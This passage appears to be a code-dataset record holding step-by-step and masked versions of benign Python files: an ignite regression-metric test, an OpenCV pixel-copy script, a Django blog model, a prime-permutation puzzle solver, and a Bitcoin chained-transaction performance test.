test_cases\n for _ in range(10):\n test_cases = get_test_cases()\n for y_pred, y, batch_size in test_cases:\n _test(y_pred, y, batch_size)\n", "step-4": "import numpy as np\nimport pytest\nimport torch\nfrom ignite.contrib.metrics.regression import MeanNormalizedBias\nfrom ignite.engine import Engine\nfrom ignite.exceptions import NotComputableError\n\n\ndef test_zero_sample():\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match=\n 'MeanNormalizedBias must have at least one example before it can be computed'\n ):\n m.compute()\n\n\ndef test_zero_gt():\n a = np.random.randn(4)\n ground_truth = np.zeros(4)\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match='The ground truth has 0.'):\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n\n\ndef test_wrong_input_shapes():\n m = MeanNormalizedBias()\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4, 1)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1), torch.rand(4, 1, 2)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4), torch.rand(4, 1, 2)))\n\n\ndef test_mean_error():\n a = np.random.randn(4)\n b = np.random.randn(4)\n c = np.random.randn(4)\n d = np.random.randn(4)\n ground_truth = np.random.randn(4)\n m = MeanNormalizedBias()\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n np_sum = ((ground_truth - a) / ground_truth).sum()\n np_len = len(a)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(b), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - b) / ground_truth).sum()\n np_len += len(b)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(c), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - c) / ground_truth).sum()\n np_len += len(c)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(d), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - d) / ground_truth).sum()\n np_len += len(d)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n\ndef test_integration():\n\n def _test(y_pred, y, batch_size):\n\n def update_fn(engine, batch):\n idx = (engine.state.iteration - 1) * batch_size\n y_true_batch = np_y[idx:idx + batch_size]\n y_pred_batch = np_y_pred[idx:idx + batch_size]\n return torch.from_numpy(y_pred_batch), torch.from_numpy(\n y_true_batch)\n engine = Engine(update_fn)\n m = MeanNormalizedBias()\n m.attach(engine, 'mnb')\n np_y = y.numpy()\n np_y_pred = y_pred.numpy()\n data = list(range(y_pred.shape[0] // batch_size))\n mnb = engine.run(data, max_epochs=1).metrics['mnb']\n np_sum = ((np_y - np_y_pred) / np_y).sum()\n np_len = len(np_y_pred)\n np_ans = np_sum / np_len\n assert np_ans == pytest.approx(mnb)\n\n def get_test_cases():\n test_cases = [(torch.rand(size=(100,)), torch.rand(size=(100,)), 10\n ), (torch.rand(size=(200,)), torch.rand(size=(200,)), 10), (\n torch.rand(size=(100,)), torch.rand(size=(100,)), 20), (torch.\n rand(size=(200,)), torch.rand(size=(200,)), 20)]\n return test_cases\n for _ in range(10):\n test_cases = get_test_cases()\n for y_pred, y, batch_size in test_cases:\n _test(y_pred, y, batch_size)\n", "step-5": "import numpy as np\nimport pytest\nimport torch\n\nfrom ignite.contrib.metrics.regression import MeanNormalizedBias\nfrom ignite.engine import Engine\nfrom ignite.exceptions import NotComputableError\n\n\ndef test_zero_sample():\n m = MeanNormalizedBias()\n with pytest.raises(\n NotComputableError, match=r\"MeanNormalizedBias must have at least one example before it can be computed\"\n ):\n m.compute()\n\n\ndef test_zero_gt():\n a = np.random.randn(4)\n ground_truth = np.zeros(4)\n\n m = MeanNormalizedBias()\n\n with pytest.raises(NotComputableError, match=r\"The ground truth has 0.\"):\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n\n\ndef test_wrong_input_shapes():\n m = MeanNormalizedBias()\n\n with pytest.raises(ValueError, match=r\"Input data shapes should be the same, but given\"):\n m.update((torch.rand(4, 1, 2), torch.rand(4, 1)))\n\n with pytest.raises(ValueError, match=r\"Input data shapes should be the same, but given\"):\n m.update((torch.rand(4, 1), torch.rand(4, 1, 2)))\n\n with pytest.raises(ValueError, match=r\"Input data shapes should be the same, but given\"):\n m.update((torch.rand(4, 1, 2), torch.rand(4,),))\n\n with pytest.raises(ValueError, match=r\"Input data shapes should be the same, but given\"):\n m.update((torch.rand(4,), torch.rand(4, 1, 2),))\n\n\ndef test_mean_error():\n a = np.random.randn(4)\n b = np.random.randn(4)\n c = np.random.randn(4)\n d = np.random.randn(4)\n ground_truth = np.random.randn(4)\n\n m = MeanNormalizedBias()\n\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n np_sum = ((ground_truth - a) / ground_truth).sum()\n np_len = len(a)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n m.update((torch.from_numpy(b), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - b) / ground_truth).sum()\n np_len += len(b)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n m.update((torch.from_numpy(c), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - c) / ground_truth).sum()\n np_len += len(c)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n m.update((torch.from_numpy(d), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - d) / ground_truth).sum()\n np_len += len(d)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n\ndef test_integration():\n def _test(y_pred, y, batch_size):\n def update_fn(engine, batch):\n idx = (engine.state.iteration - 1) * batch_size\n y_true_batch = np_y[idx : idx + batch_size]\n y_pred_batch = np_y_pred[idx : idx + batch_size]\n return torch.from_numpy(y_pred_batch), torch.from_numpy(y_true_batch)\n\n engine = Engine(update_fn)\n\n m = MeanNormalizedBias()\n m.attach(engine, \"mnb\")\n\n np_y = y.numpy()\n np_y_pred = y_pred.numpy()\n\n data = list(range(y_pred.shape[0] // batch_size))\n mnb = engine.run(data, max_epochs=1).metrics[\"mnb\"]\n\n np_sum = ((np_y - np_y_pred) / np_y).sum()\n np_len = len(np_y_pred)\n np_ans = np_sum / np_len\n\n assert np_ans == pytest.approx(mnb)\n\n def get_test_cases():\n test_cases = [\n (torch.rand(size=(100,)), torch.rand(size=(100,)), 10),\n (torch.rand(size=(200,)), torch.rand(size=(200,)), 10),\n (torch.rand(size=(100,)), torch.rand(size=(100,)), 20),\n (torch.rand(size=(200,)), torch.rand(size=(200,)), 20),\n ]\n return test_cases\n\n for _ in range(10):\n # check multiple random inputs as random exact occurencies are rare\n test_cases = get_test_cases()\n for y_pred, y, batch_size in test_cases:\n _test(y_pred, y, batch_size)\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
import random import cv2 img = cv2.imread('assets/logo.jpg', -1) print(img.shape) #3 channels, bgr #look at the 257. row and pixel 400 --> has bgr values: [41 98 243] print(img[257][400]) ''' # manipulate the first 100 rows, all columns, and randomize the 3 pixel values # (rows, colums, pixels) where pixels: b,g,r for i in range(100): #first 100 rows for j in range(img.shape[1]): #all the colums img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)] cv2.imshow('modifiedImage', img) cv2.waitKey(0) cv2.destroyAllWindows() ''' #copy one part of the image and copy it somewhere else #take the pixels from row 500 bis 700 und davon die colums 600:900 tag = img[500:700, 600:900] #part of the picture #paste this on another location in the image; needs same dimeension/ size img[100:300, 650:950] = tag cv2.imshow('Image', img) cv2.waitKey(0) cv2.destroyAllWindows()
normal
{ "blob_id": "35e66e5e154f5cd70f187a1cde33cef71102e1a6", "index": 6829, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "step-3": "<mask token>\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "step-4": "import random\nimport cv2\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "step-5": "import random\nimport cv2\n\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape) #3 channels, bgr\n\n#look at the 257. row and pixel 400 --> has bgr values: [41 98 243]\nprint(img[257][400])\n\n'''\n# manipulate the first 100 rows, all columns, and randomize the 3 pixel values\n# (rows, colums, pixels) where pixels: b,g,r\nfor i in range(100): #first 100 rows\n for j in range(img.shape[1]): #all the colums\n img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n\ncv2.imshow('modifiedImage', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''\n\n#copy one part of the image and copy it somewhere else\n#take the pixels from row 500 bis 700 und davon die colums 600:900\ntag = img[500:700, 600:900] #part of the picture\n\n#paste this on another location in the image; needs same dimeension/ size\nimg[100:300, 650:950] = tag\n\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Create your models here. from django.db import models from django.utils import timezone from django.db import models # Create your models here. #필드 개수가 다르다. class Post(models.Model): #이 Post의 저자이다라는 의미, CASCADE : 종속이라는 의미 author = models.ForeignKey('auth.User', on_delete=models.CASCADE) title = models.CharField(max_length=200) #블로그 기사의 제목 text = models.TextField() # 글자수에 제한 없는 텍스트 #생성자를 만들때마다, 반드시 필수 파라미터가 존재해야한다. created_date = models.DateTimeField( default=timezone.now) # 날짜와 시간 #Null Field를 허용 published_date = models.DateTimeField( blank=True, null=True) # 필드가 폼에서 빈 채로 저장되는 것을 허용, null은 DB 관점 def publish(self): #published_data를 지금날짜로 바꾸고 save self.published_date = timezone.now() self.save() def __str__(self): return self.title
normal
{ "blob_id": "fe5398b03d2f0cfc7c972677faa0ea3ec701469e", "index": 7858, "step-1": "<mask token>\n\n\nclass Post(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Post(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n", "step-3": "<mask token>\n\n\nclass Post(models.Model):\n author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n title = models.CharField(max_length=200)\n text = models.TextField()\n created_date = models.DateTimeField(default=timezone.now)\n published_date = models.DateTimeField(blank=True, null=True)\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n", "step-4": "from django.db import models\nfrom django.utils import timezone\nfrom django.db import models\n\n\nclass Post(models.Model):\n author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n title = models.CharField(max_length=200)\n text = models.TextField()\n created_date = models.DateTimeField(default=timezone.now)\n published_date = models.DateTimeField(blank=True, null=True)\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n", "step-5": "# Create your models here.\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.db import models\n\n# Create your models here.\n#필드 개수가 다르다.\n\nclass Post(models.Model):\n #이 Post의 저자이다라는 의미, CASCADE : 종속이라는 의미\n author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n title = models.CharField(max_length=200) #블로그 기사의 제목\n text = models.TextField() # 글자수에 제한 없는 텍스트\n #생성자를 만들때마다, 반드시 필수 파라미터가 존재해야한다.\n created_date = models.DateTimeField(\n default=timezone.now) # 날짜와 시간\n #Null Field를 허용\n published_date = models.DateTimeField(\n blank=True, null=True) # 필드가 폼에서 빈 채로 저장되는 것을 허용, null은 DB 관점\n\n def publish(self):\n #published_data를 지금날짜로 바꾸고 save\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
# find the 12-digit number formed by concatenating a series of 3 4-digit # numbers who are permutations of each other and are all prime from itertools import permutations, dropwhile from pe_utils import prime_sieve prime_set = set(prime_sieve(10000)) def perm(n, inc): perm_set = set(map(lambda x: int("".join(x)), permutations(str(n)))) perms = (n, n + inc, n + inc*2) if any(map(lambda x: x not in prime_set or x not in perm_set, perms)): return None else: return perms primes = dropwhile(lambda x: x < 1000, prime_sieve(3333)) primes = filter(lambda x: x != None, map(lambda x: perm(x, 3330), primes)) primes = list(map(lambda x: x[0] * 10**8 + x[1] * 10**4 + x[2], primes)) print(primes)
normal
{ "blob_id": "e03290746d6520fde63836e917f6af0c76596704", "index": 3816, "step-1": "<mask token>\n\n\ndef perm(n, inc):\n perm_set = set(map(lambda x: int(''.join(x)), permutations(str(n))))\n perms = n, n + inc, n + inc * 2\n if any(map(lambda x: x not in prime_set or x not in perm_set, perms)):\n return None\n else:\n return perms\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef perm(n, inc):\n perm_set = set(map(lambda x: int(''.join(x)), permutations(str(n))))\n perms = n, n + inc, n + inc * 2\n if any(map(lambda x: x not in prime_set or x not in perm_set, perms)):\n return None\n else:\n return perms\n\n\n<mask token>\nprint(primes)\n", "step-3": "<mask token>\nprime_set = set(prime_sieve(10000))\n\n\ndef perm(n, inc):\n perm_set = set(map(lambda x: int(''.join(x)), permutations(str(n))))\n perms = n, n + inc, n + inc * 2\n if any(map(lambda x: x not in prime_set or x not in perm_set, perms)):\n return None\n else:\n return perms\n\n\nprimes = dropwhile(lambda x: x < 1000, prime_sieve(3333))\nprimes = filter(lambda x: x != None, map(lambda x: perm(x, 3330), primes))\nprimes = list(map(lambda x: x[0] * 10 ** 8 + x[1] * 10 ** 4 + x[2], primes))\nprint(primes)\n", "step-4": "from itertools import permutations, dropwhile\nfrom pe_utils import prime_sieve\nprime_set = set(prime_sieve(10000))\n\n\ndef perm(n, inc):\n perm_set = set(map(lambda x: int(''.join(x)), permutations(str(n))))\n perms = n, n + inc, n + inc * 2\n if any(map(lambda x: x not in prime_set or x not in perm_set, perms)):\n return None\n else:\n return perms\n\n\nprimes = dropwhile(lambda x: x < 1000, prime_sieve(3333))\nprimes = filter(lambda x: x != None, map(lambda x: perm(x, 3330), primes))\nprimes = list(map(lambda x: x[0] * 10 ** 8 + x[1] * 10 ** 4 + x[2], primes))\nprint(primes)\n", "step-5": "# find the 12-digit number formed by concatenating a series of 3 4-digit\n# numbers who are permutations of each other and are all prime\n\nfrom itertools import permutations, dropwhile\nfrom pe_utils import prime_sieve\n\nprime_set = set(prime_sieve(10000))\n\ndef perm(n, inc):\n perm_set = set(map(lambda x: int(\"\".join(x)), permutations(str(n))))\n perms = (n, n + inc, n + inc*2)\n if any(map(lambda x: x not in prime_set or x not in perm_set, perms)):\n return None\n else:\n return perms\n\n\nprimes = dropwhile(lambda x: x < 1000, prime_sieve(3333))\nprimes = filter(lambda x: x != None, map(lambda x: perm(x, 3330), primes))\nprimes = list(map(lambda x: x[0] * 10**8 + x[1] * 10**4 + x[2], primes))\nprint(primes)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python3 # Copyright (c) 2018 Nobody # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test perforance of descendant package (chained transactions)""" import time import copy from test_framework.test_framework import BitcoinTestFramework from test_framework.util import * from test_framework.mininode import COIN from test_framework.blocktools import * """Read optional arguments from command line""" CHAINED_TX = 25 if len(sys.argv)>1: CHAINED_TX = int(sys.argv[1]) TEST_ITERATIONS = 1 if len(sys.argv)>2: TEST_ITERATIONS = int(sys.argv[2]) DEBUG_MODE = '-printtoconsole' MAX_ANCESTORS = CHAINED_TX MAX_DESCENDANTS = CHAINED_TX MAGNETIC_ANOMALY_START_TIME = 2000000000 class ChainedTest(BitcoinTestFramework): def set_test_params(self): ''' our test network requires a peer node so that getblocktemplate succeeds ''' self.num_nodes = 2 chained_args = ["-limitancestorcount=2000", "-limitdescendantcount=2000", "-limitancestorsize=1000", "-limitdescendantsize=1000", "-magneticanomalyactivationtime=%d" % MAGNETIC_ANOMALY_START_TIME ] config_node2 = chained_args.copy() if DEBUG_MODE: chained_args.append(DEBUG_MODE) self.extra_args = [chained_args, config_node2] # Build a transaction that spends parent_txid:vout # Return amount sent def chain_transaction(self, node, parent_txid, vout, value, fee, num_outputs): send_value = satoshi_round((value - fee) / num_outputs) inputs = [{'txid': parent_txid, 'vout': vout}] outputs = {} for i in range(num_outputs): outputs[node.getnewaddress()] = send_value rawtx = node.createrawtransaction(inputs, outputs) signedtx = node.signrawtransaction(rawtx) #measure the performance of sending the raw transaction to the node sendtx_start = time.perf_counter() new_txid = node.sendrawtransaction(signedtx['hex']) sendtx_stop = time.perf_counter() fulltx = node.getrawtransaction(new_txid, 1) #self.log.info('{0} => {1}'.format(parent_txid, fulltx['vout'][0])) # make sure we didn't generate a change output assert(len(fulltx['vout']) == num_outputs) return (new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size']) def mine_blocks(self): ''' Mine some blocks and have them mature. ''' self.nodes[0].generate(101) self.utxo = self.nodes[0].listunspent(10) self.txid = self.utxo[0]['txid'] self.coinbasetx = self.txid self.vout = self.utxo[0]['vout'] self.value = self.utxo[0]['amount'] self.fee = Decimal("0.0001") self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0) self.block_time = int(time.time()) + 1 def send_chain_to_node(self): ''' Generates tx chain and send it to node ''' for i in range(CHAINED_TX): (sent_txid, sent_value, this_sendtx, tx_size) = self.chain_transaction( self.nodes[0], self.txid, 0, self.value, self.fee, 1) if not self.chain_top: self.chain_top = sent_txid self.txid = sent_txid self.value = sent_value self.chain.append(sent_txid) self.mempool_send += this_sendtx self.mempool_size += tx_size def create_new_block(self): ''' Create a new block with an anyone-can-spend coinbase ''' block = create_block( self.tip, create_coinbase(self.height), self.block_time) self.block_time += 1 block.solve() return block def mempool_count(self): ''' get count of tx in mempool ''' mininginfo = self.nodes[0].getmininginfo() return mininginfo['pooledtx'] def dumppool(self, mempool): ''' Show list of chained tx in mempool with parent(depends) ''' def sortdepends(e): return e['descendantcount'] sortedlist = [[k,v] for k,v in mempool.items()] sortedlist = sorted(sortedlist, key=lambda l: l[1]['descendantcount'], reverse=True) for memkv in sortedlist: memtx = memkv[1] self.log.info('{} {} {}'.format(memkv[0], memtx['descendantcount'], memtx['depends'])) def run_test(self): self.log.info('Starting Test with {0} Chained Transactions'.format(CHAINED_TX)) self.chain_top = None self.mine_blocks() self.mempool_send = 0 self.mempool_size = 0 self.chain = [] self.send_chain_to_node() # mempool should have all our tx assert(self.mempool_count() == CHAINED_TX) mempool = self.nodes[0].getrawmempool(True) self.log.info('tx at top has {} descendants'.format(mempool[self.chain_top]["descendantcount"])) assert(mempool[self.chain_top]["descendantcount"] == CHAINED_TX) #self.dumppool(mempool) self.height = 1 # create new block and save coinbase self.block1 = self.create_new_block() self.tip = self.block1.sha256 self.height += 1 #mature the block so we can spend the coinbase for i in range(100): block = self.create_new_block() self.tip = block.sha256 self.height += 1 #sync pool not needed as long as we are using node 0 which has all the tx we sent to it #sync_mempools(self.nodes, wait=1, timeout=100) self.runs=[] for test_iteration in range(TEST_ITERATIONS): # do not use perf_counter. use timer from -printtoconsole instead gbt_start = time.perf_counter() # assemble a block and validate all tx in it templat = self.nodes[0].getblocktemplate() gbt_stop = time.perf_counter() # make sure all tx got mined assert(len(templat['transactions']) == CHAINED_TX) self.runs.append(gbt_stop - gbt_start) #assert(self.mempool_count() == 0) self.log.info('Mempool size {0}'.format(self.mempool_size)) self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send)) if len(self.runs) > 1: self.log.info('run times {}'.format(self.runs)) self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs)/len(self.runs))) if __name__ == '__main__': ChainedTest().main()
normal
{ "blob_id": "661eef8500309191514fd760b7518014dee2bb5f", "index": 9225, "step-1": "<mask token>\n\n\nclass ChainedTest(BitcoinTestFramework):\n\n def set_test_params(self):\n \"\"\" our test network requires a peer node so that getblocktemplate succeeds \"\"\"\n self.num_nodes = 2\n chained_args = ['-limitancestorcount=2000',\n '-limitdescendantcount=2000', '-limitancestorsize=1000',\n '-limitdescendantsize=1000', \n '-magneticanomalyactivationtime=%d' % MAGNETIC_ANOMALY_START_TIME]\n config_node2 = chained_args.copy()\n if DEBUG_MODE:\n chained_args.append(DEBUG_MODE)\n self.extra_args = [chained_args, config_node2]\n\n def chain_transaction(self, node, parent_txid, vout, value, fee,\n num_outputs):\n send_value = satoshi_round((value - fee) / num_outputs)\n inputs = [{'txid': parent_txid, 'vout': vout}]\n outputs = {}\n for i in range(num_outputs):\n outputs[node.getnewaddress()] = send_value\n rawtx = node.createrawtransaction(inputs, outputs)\n signedtx = node.signrawtransaction(rawtx)\n sendtx_start = time.perf_counter()\n new_txid = node.sendrawtransaction(signedtx['hex'])\n sendtx_stop = time.perf_counter()\n fulltx = node.getrawtransaction(new_txid, 1)\n assert len(fulltx['vout']) == num_outputs\n return new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size']\n\n def mine_blocks(self):\n \"\"\" Mine some blocks and have them mature. \"\"\"\n self.nodes[0].generate(101)\n self.utxo = self.nodes[0].listunspent(10)\n self.txid = self.utxo[0]['txid']\n self.coinbasetx = self.txid\n self.vout = self.utxo[0]['vout']\n self.value = self.utxo[0]['amount']\n self.fee = Decimal('0.0001')\n self.tip = int('0x' + self.nodes[0].getbestblockhash(), 0)\n self.block_time = int(time.time()) + 1\n\n def send_chain_to_node(self):\n \"\"\" Generates tx chain and send it to node \"\"\"\n for i in range(CHAINED_TX):\n sent_txid, sent_value, this_sendtx, tx_size = (self.\n chain_transaction(self.nodes[0], self.txid, 0, self.value,\n self.fee, 1))\n if not self.chain_top:\n self.chain_top = sent_txid\n self.txid = sent_txid\n self.value = sent_value\n self.chain.append(sent_txid)\n self.mempool_send += this_sendtx\n self.mempool_size += tx_size\n\n def create_new_block(self):\n \"\"\" Create a new block with an anyone-can-spend coinbase \"\"\"\n block = create_block(self.tip, create_coinbase(self.height), self.\n block_time)\n self.block_time += 1\n block.solve()\n return block\n <mask token>\n <mask token>\n\n def run_test(self):\n self.log.info('Starting Test with {0} Chained Transactions'.format(\n CHAINED_TX))\n self.chain_top = None\n self.mine_blocks()\n self.mempool_send = 0\n self.mempool_size = 0\n self.chain = []\n self.send_chain_to_node()\n assert self.mempool_count() == CHAINED_TX\n mempool = self.nodes[0].getrawmempool(True)\n self.log.info('tx at top has {} descendants'.format(mempool[self.\n chain_top]['descendantcount']))\n assert mempool[self.chain_top]['descendantcount'] == CHAINED_TX\n self.height = 1\n self.block1 = self.create_new_block()\n self.tip = self.block1.sha256\n self.height += 1\n for i in range(100):\n block = self.create_new_block()\n self.tip = block.sha256\n self.height += 1\n self.runs = []\n for test_iteration in range(TEST_ITERATIONS):\n gbt_start = time.perf_counter()\n templat = self.nodes[0].getblocktemplate()\n gbt_stop = time.perf_counter()\n assert len(templat['transactions']) == CHAINED_TX\n self.runs.append(gbt_stop - gbt_start)\n self.log.info('Mempool size {0}'.format(self.mempool_size))\n self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))\n if len(self.runs) > 1:\n self.log.info('run times {}'.format(self.runs))\n self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs) / len(\n self.runs)))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass ChainedTest(BitcoinTestFramework):\n\n def set_test_params(self):\n \"\"\" our test network requires a peer node so that getblocktemplate succeeds \"\"\"\n self.num_nodes = 2\n chained_args = ['-limitancestorcount=2000',\n '-limitdescendantcount=2000', '-limitancestorsize=1000',\n '-limitdescendantsize=1000', \n '-magneticanomalyactivationtime=%d' % MAGNETIC_ANOMALY_START_TIME]\n config_node2 = chained_args.copy()\n if DEBUG_MODE:\n chained_args.append(DEBUG_MODE)\n self.extra_args = [chained_args, config_node2]\n\n def chain_transaction(self, node, parent_txid, vout, value, fee,\n num_outputs):\n send_value = satoshi_round((value - fee) / num_outputs)\n inputs = [{'txid': parent_txid, 'vout': vout}]\n outputs = {}\n for i in range(num_outputs):\n outputs[node.getnewaddress()] = send_value\n rawtx = node.createrawtransaction(inputs, outputs)\n signedtx = node.signrawtransaction(rawtx)\n sendtx_start = time.perf_counter()\n new_txid = node.sendrawtransaction(signedtx['hex'])\n sendtx_stop = time.perf_counter()\n fulltx = node.getrawtransaction(new_txid, 1)\n assert len(fulltx['vout']) == num_outputs\n return new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size']\n\n def mine_blocks(self):\n \"\"\" Mine some blocks and have them mature. \"\"\"\n self.nodes[0].generate(101)\n self.utxo = self.nodes[0].listunspent(10)\n self.txid = self.utxo[0]['txid']\n self.coinbasetx = self.txid\n self.vout = self.utxo[0]['vout']\n self.value = self.utxo[0]['amount']\n self.fee = Decimal('0.0001')\n self.tip = int('0x' + self.nodes[0].getbestblockhash(), 0)\n self.block_time = int(time.time()) + 1\n\n def send_chain_to_node(self):\n \"\"\" Generates tx chain and send it to node \"\"\"\n for i in range(CHAINED_TX):\n sent_txid, sent_value, this_sendtx, tx_size = (self.\n chain_transaction(self.nodes[0], self.txid, 0, self.value,\n self.fee, 1))\n if not self.chain_top:\n self.chain_top = sent_txid\n self.txid = sent_txid\n self.value = sent_value\n self.chain.append(sent_txid)\n self.mempool_send += this_sendtx\n self.mempool_size += tx_size\n\n def create_new_block(self):\n \"\"\" Create a new block with an anyone-can-spend coinbase \"\"\"\n block = create_block(self.tip, create_coinbase(self.height), self.\n block_time)\n self.block_time += 1\n block.solve()\n return block\n <mask token>\n\n def dumppool(self, mempool):\n \"\"\" Show list of chained tx in mempool with parent(depends) \"\"\"\n\n def sortdepends(e):\n return e['descendantcount']\n sortedlist = [[k, v] for k, v in mempool.items()]\n sortedlist = sorted(sortedlist, key=lambda l: l[1][\n 'descendantcount'], reverse=True)\n for memkv in sortedlist:\n memtx = memkv[1]\n self.log.info('{} {} {}'.format(memkv[0], memtx[\n 'descendantcount'], memtx['depends']))\n\n def run_test(self):\n self.log.info('Starting Test with {0} Chained Transactions'.format(\n CHAINED_TX))\n self.chain_top = None\n self.mine_blocks()\n self.mempool_send = 0\n self.mempool_size = 0\n self.chain = []\n self.send_chain_to_node()\n assert self.mempool_count() == CHAINED_TX\n mempool = self.nodes[0].getrawmempool(True)\n self.log.info('tx at top has {} descendants'.format(mempool[self.\n chain_top]['descendantcount']))\n assert mempool[self.chain_top]['descendantcount'] == CHAINED_TX\n self.height = 1\n self.block1 = self.create_new_block()\n self.tip = self.block1.sha256\n self.height += 1\n for i in range(100):\n block = self.create_new_block()\n self.tip = block.sha256\n self.height += 1\n self.runs = []\n for test_iteration in range(TEST_ITERATIONS):\n gbt_start = time.perf_counter()\n templat = self.nodes[0].getblocktemplate()\n gbt_stop = time.perf_counter()\n assert len(templat['transactions']) == CHAINED_TX\n self.runs.append(gbt_stop - gbt_start)\n self.log.info('Mempool size {0}'.format(self.mempool_size))\n self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))\n if len(self.runs) > 1:\n self.log.info('run times {}'.format(self.runs))\n self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs) / len(\n self.runs)))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass ChainedTest(BitcoinTestFramework):\n\n def set_test_params(self):\n \"\"\" our test network requires a peer node so that getblocktemplate succeeds \"\"\"\n self.num_nodes = 2\n chained_args = ['-limitancestorcount=2000',\n '-limitdescendantcount=2000', '-limitancestorsize=1000',\n '-limitdescendantsize=1000', \n '-magneticanomalyactivationtime=%d' % MAGNETIC_ANOMALY_START_TIME]\n config_node2 = chained_args.copy()\n if DEBUG_MODE:\n chained_args.append(DEBUG_MODE)\n self.extra_args = [chained_args, config_node2]\n\n def chain_transaction(self, node, parent_txid, vout, value, fee,\n num_outputs):\n send_value = satoshi_round((value - fee) / num_outputs)\n inputs = [{'txid': parent_txid, 'vout': vout}]\n outputs = {}\n for i in range(num_outputs):\n outputs[node.getnewaddress()] = send_value\n rawtx = node.createrawtransaction(inputs, outputs)\n signedtx = node.signrawtransaction(rawtx)\n sendtx_start = time.perf_counter()\n new_txid = node.sendrawtransaction(signedtx['hex'])\n sendtx_stop = time.perf_counter()\n fulltx = node.getrawtransaction(new_txid, 1)\n assert len(fulltx['vout']) == num_outputs\n return new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size']\n\n def mine_blocks(self):\n \"\"\" Mine some blocks and have them mature. \"\"\"\n self.nodes[0].generate(101)\n self.utxo = self.nodes[0].listunspent(10)\n self.txid = self.utxo[0]['txid']\n self.coinbasetx = self.txid\n self.vout = self.utxo[0]['vout']\n self.value = self.utxo[0]['amount']\n self.fee = Decimal('0.0001')\n self.tip = int('0x' + self.nodes[0].getbestblockhash(), 0)\n self.block_time = int(time.time()) + 1\n\n def send_chain_to_node(self):\n \"\"\" 